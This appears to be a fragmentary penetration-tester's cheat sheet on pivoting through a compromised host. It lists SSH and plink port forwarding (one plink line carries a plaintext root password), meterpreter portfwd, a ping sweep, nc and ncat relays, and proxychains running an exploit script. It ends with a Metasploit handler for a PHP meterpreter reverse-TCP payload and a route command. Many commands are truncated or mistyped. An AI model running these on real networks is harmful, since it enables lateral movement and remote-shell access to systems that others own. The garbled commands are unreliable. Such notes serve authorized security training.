Pivotind understanding


ssh -L 9001:yahoo.com:80 home -L ::

ssh -L ::

ssh -R 9001:intra-site.com:80 home (Executed from 'work')

plink.exe -l root -pw mysecretpassword -R 3307:

Port forward with metasploit We can also forward ports using metasploit. Say that the compromised machine is running services that are only accessible from within the network, from within that machine. To access that port we can do this in meterpreter: portfwd add -l -p -r portfwd add -l 3306 -p 3306 -r 192.168.222

portfwd add -l 3389 -p 3389 -r

root@host:~# for i in $(seq 1 254); do (ping -c 1 10.2.2.${i} | grep "bytes from" &); done;

$nc –l –p 80 0backpipe

ssh –L port:destination_host:destination_port username@pivot_host

ssh -L 80:ip:80 user@ip - local port forwarding

nmap -PN -sT -sV –p 80 localhost

nmap -PN -sV –p 80 --script=http-methods localhost

nikto -host ip -useproxy

burp suite: destination host: * proxy host: proxy port: 80 Authenticaton type: none

Dynamic port forwarding

SSH dynamic port forwarding is set up on the attacker’s system by entering:

ssh -D -f -N user@ip

The syntax of the command is ssh –D address:port –f –N username@pivot_host

2.8 Using Ncat for Pivoting

ncat --listen --proxy-type http ip 8080

run post/windows/gather/arp_scanner RHOSTS=

use auxiliary/server/socks4a

==================================================================================== ssh portforwarding

ssh -L webmaster@ip

ssh -L webmaster@ip


proxychaing portforwarding https://github.com/haad/proxychains

ssh -D webmaster@ip

strict_chain quiet_mode proxy_dns remote_dns_subnet 224 tcp_read_time_out 15000 tcp_connect_time_out 8000 localnet

[ProxyList] socks4 8888

proxychains4 -f ~/pivot.conf /usr/bin/python exploit.py ip 10000

proxychains4 -f ~/pivot.conf ncat -v ip 4444


ncat LDFLAGS="-static" ./configure && make ncat_build (build ncat static binary)

ncat -lv --broker -m2 10000 $ ncat -v 10000 -c "ncat -v 10000"

./exploit.py 10000

ncat -lv --broker -m2 4444

$ ncat -v 4444 -c "ncat -v 4444"

nc -v 4444

============================================================================= metasploit

msfcli exploit/multi/handler PAYLOAD=php/meterpreter_reverse_tcp LHOST=ip LPORT=9999 E

msf exploit(handler) > route add ip 1